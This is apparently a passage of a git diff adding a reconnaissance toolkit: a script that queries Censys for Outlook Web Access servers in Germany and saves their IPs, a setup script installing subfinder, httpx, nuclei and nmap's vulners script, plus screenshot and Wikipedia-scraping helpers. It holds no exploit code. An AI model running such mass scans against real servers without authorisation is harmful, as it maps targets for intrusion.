"sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==" + }, + "path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=" + }, + "pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha1-elfrVQpng/kRUzH89GY9XI4AelA=" + }, + "pkg-dir": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", + "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "requires": { + "find-up": "^4.0.0" + } + }, + "progress": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.1.tgz", + "integrity": "sha512-OE+a6vzqazc+K6LxJrX5UPyKFvGnL5CYmq2jFGNIBWHpc4QyE49/YOumcrpQFJpfejmvRtbJzgO1zPmMCqlbBg==" + }, + "proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" + }, + "pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "requires": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "puppeteer": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/puppeteer/-/puppeteer-10.4.0.tgz", + "integrity": "sha512-2cP8mBoqnu5gzAVpbZ0fRaobBWZM8GEUF4I1F6WbgHrKV/rz7SX8PG2wMymZgD0wo0UBlg2FBPNxlF/xlqW6+w==", + "requires": { + "debug": "4.3.1", + "devtools-protocol": "0.0.901419", + "extract-zip": "2.0.1", + "https-proxy-agent": "5.0.0", + "node-fetch": "2.6.1", + "pkg-dir": "4.2.0", + "progress": "2.0.1", + "proxy-from-env": "1.1.0", + "rimraf": "3.0.2", + "tar-fs": "2.0.0", + "unbzip2-stream": "1.3.3", + "ws": "7.4.6" + } + }, + "readable-stream": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.0.tgz", + "integrity": "sha512-BViHy7LKeTz4oNnkcLJ+lVSL6vpiFeX6/d3oSH8zCW7UxP2onchk+vTGB143xuFjHS3deTgkKoXXymXqymiIdA==", + "requires": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + } + }, + "rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "requires": { + "glob": "^7.1.3" + } + }, + "safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" + }, + "string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "requires": { + "safe-buffer": "~5.2.0" + } + }, + "tar-fs": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.0.0.tgz", + "integrity": "sha512-vaY0obB6Om/fso8a8vakQBzwholQ7v5+uy+tF3Ozvxv1KNezmVQAiWtcNmMHFSFPqL3dJA8ha6gdtFbfX9mcxA==", + "requires": { + "chownr": "^1.1.1", + "mkdirp": "^0.5.1", + "pump": "^3.0.0", + "tar-stream": "^2.0.0" + } + }, + "tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "requires": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + } + }, + "through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU=" + }, + "unbzip2-stream": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/unbzip2-stream/-/unbzip2-stream-1.3.3.tgz", + "integrity": "sha512-fUlAF7U9Ah1Q6EieQ4x4zLNejrRvDWUYmxXUpN3uziFYCHapjWFaCAnreY9bGgxzaMCFAPPpYNng57CypwJVhg==", + "requires": { + "buffer": "^5.2.1", + "through": "^2.3.8" + } + }, + "util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha1-RQ1Nyfpw3nMnYvvS1KKJgUGaDM8=" + }, + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" + }, + "ws": { + "version": "7.4.6", + "resolved": "https://registry.npmjs.org/ws/-/ws-7.4.6.tgz", + "integrity": "sha512-YmhHDO4MzaDLB+M9ym/mDA5z0naX8j7SIlT8f8z+I0VtzsRbekxEutHSme7NPS2qE8StCYQNUnfWdXta/Yu85A==", + "requires": {} + }, + "yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha1-x+sXyT4RLLEIb6bY5R+wZnt5pfk=", + "requires": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + } + } +} diff --git a/scripts/package.json b/scripts/package.json new file mode 100644 index 0000000..bc5c1db --- /dev/null +++ b/scripts/package.json @@ -0,0 +1,5 @@ +{ + "dependencies": { + "puppeteer": "^10.4.0" + } +} diff --git a/scripts/scandb.py b/scripts/scandb.py new file mode 100644 index 0000000..90da493 --- /dev/null +++ b/scripts/scandb.py @@ -0,0 +1,15 @@ +from censys.search import CensysHosts +import time + +h = CensysHosts() + +ip_result = [] +for count in range(10, 1000): + for page in h.search('services.http.response.html_title:"Outlook" and location.country=`Germany`', pages=count): + for result in page: + print(result["ip"]) + ip_result.append(result["ip"]) + time.sleep(3) + +with open("owa_deutschland.txt", "a") as my_file: + my_file.write("\n".join(ip_result)) \ No newline at end of file diff --git a/scripts/setup.sh b/scripts/setup.sh new file mode 100644 index 0000000..e758b3c --- /dev/null +++ b/scripts/setup.sh @@ -0,0 +1,17 @@ +#!/bin/bash + +echo "Install golang" +apt install golang nmap curl +echo "Install project discovery" +go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest +go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest +go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest +echo "nmap vulners script" +if [[ -f "/usr/share/nmap/scripts/" ]] +then + curl https://svn.nmap.org/nmap/scripts/vulners.nse > /usr/share/nmap/scripts/vulners.nse +fi +if [[ -f "/opt/homebrew/Cellar/nmap/7.92/share/nmap/scripts/" ]] +then + curl https://svn.nmap.org/nmap/scripts/vulners.nse > /opt/homebrew/Cellar/nmap/7.92/share/nmap/scripts +fi \ No newline at end of file diff --git a/scripts/take-screenshots.py b/scripts/take-screenshots.py new file mode 100644 index 0000000..88cf236 --- /dev/null +++ b/scripts/take-screenshots.py @@ -0,0 +1,58 @@ +import argparse +import asyncio +from pyppeteer import launch +from os.path import exists + + +async def main(): + with open(input_file, "r") as myfile: + content = myfile.readlines() + browser = await launch({"ignoreHTTPSErrors": True}) + page = await browser.newPage() + counter = 0 + for url in content: + counter = counter + 1 + if exists(output_folder + str(counter) + ".png"): + continue + + # only use url and not banner + if "," in url: + url_array = url.split(",") + url = url_array[0] + + try: + await page.goto(url) + await page.addStyleTag( + content="html::before { content: '" + url.strip() + "'}" + ) + except Exception as e: + continue + try: + await page.waitForNavigation(timeout=3) + except Exception as e: + pass + await page.screenshot({"path": output_folder + str(counter) + ".png"}) + print(f"{url.strip()}, {str(counter)}.png") + with open(output_file, "a") as my_file: + my_file.write(f"{url.strip()}, {str(counter)}.png\n") + await browser.close() + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Take screenshots of URLs") + parser.add_argument( + "-i", type=str, default="./input.txt", help="Path to input file" + ) + parser.add_argument( + "-o", + type=str, + default="./screenshot_log.txt", + help="Path to screenshot log file", + ) + parser.add_argument( + "-folder", type=str, default="./screenshots/", help="Path to output folder" + ) + args = parser.parse_args() + input_file = args.i + output_file = args.o + output_folder = args.folder + asyncio.get_event_loop().run_until_complete(main()) \ No newline at end of file diff --git a/scripts/wiki-info.py b/scripts/wiki-info.py new file mode 100644 index 0000000..74a92ae --- /dev/null +++ b/scripts/wiki-info.py @@ -0,0 +1,60 @@ +import argparse +import requests +from bs4 import BeautifulSoup +import urllib.parse +import re + + +def main(input_file, output_file): + # use input file + with open(input_file, "r") as myfile: + content = myfile.readlines() + for line in content: + url = get_website(line) + print(url) + if len(url) > 0: + with open(output_file, "a") as out: + out.write(url + "\n") + +def get_website(url_path): + try: + clean_url_path = url_path.strip() + print("Start with: " + clean_url_path) + + session = requests.session() + session.headers[ + "User-Agent" + ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36" + response = session.get( + url="https://de.wikipedia.org" + clean_url_path, timeout=3 + ) + session.close() + + soup = BeautifulSoup(response.text, "html.parser") + url = "" + if soup.find("table"): + if soup.find("table").findAll("a", class_="external text"): + link_elements = soup.find("table").findAll("a", class_="external text") + url = ( + link_elements[len(link_elements) - 1].attrs.get("href") + ) + if soup.find("table"): + if soup.find("table").findAll("a", class_="external free"): + link_elements = soup.find("table").findAll("a", class_="external free") + url = ( + link_elements[len(link_elements) - 1].attrs.get("href") + ) + return url + except Exception as e: + print(e) + +if __name__ == "__main__": + parser = argparse.ArgumentParser( + description="Check list of strings against wikipedia." + ) + parser.add_argument("-i", type=str, default="input.txt", help="Path to input file") + parser.add_argument( + "-o", type=str, default="output.txt", help="Path to output file" + ) + args = parser.parse_args() + main(args.i, args.o) \ No newline at end of file diff --git a/style.css b/style.css new file mode 100644 index 0000000..851f01c --- /dev/null +++ b/style.css @@ -0,0 +1,108 @@ +html { + min-height: 100%; + box-shadow: inset 0 0 100px #000; + margin: 0; + padding: 0; +} +body { + background-color: #0C1C0E; + color: #55A559; + font-family: monospace; + line-height: 130%; +} +h1, h2, h3, body, p, img { + box-sizing: border-box; + animation-name: flick; + animation-duration: 1337s; + animation-timing-function: linear; + animation-iteration-count: infinite; +} +h1, h2 { + margin-bottom: 10px; + color: #6bca48; + text-shadow: 2px 2px 2px #428838; + line-height: 100%; +} +h2::after { + content: "_"; +} +a, a:link, a:visited { + color: #49902f; +} +a:hover { + background-color: #18402d; + color: #49902f; + cursor: pointer; + text-decoration: none; +} +abbr { + border-bottom: 1px dashed #00FF5F; + cursor: help; +} +ul { + list-style-type: square; +} +img { + max-width: 100%; + max-height: 250px; +} +hr { + background-color: #333; + border: none; + height: 2px; + margin: 5px 2px; +} +.comics img { + max-height: 100%; +} +table { + font-size: 90%; + border-collapse: collapse; +} +td { + vertical-align: top; + border: 1px solid #333; + padding: 3px; +} +iframe { + width: 100%; + box-shadow: 5px 5px 0px #333; +} +.center { + text-align: center; + margin: 10px auto; +} +.container img { + max-width: 32%; +} +#main { + max-width: 640px; + margin: 0px auto; + padding: 10px; +} +#tweets { + font-size: 90%; +} +.column { + column-count: 2; +} +.title li { + font-size: 90%; +} +pre, code { + line-height: 120%; + white-space: pre-wrap; + font-size: 95%; +} +@media (max-width: 800px) { + .column { + column-count: 1; + } +} +@keyframes flick { + 0% {} + 50% { + filter: hue-rotate(45deg); + } + 100% {} +} \ No newline at end of file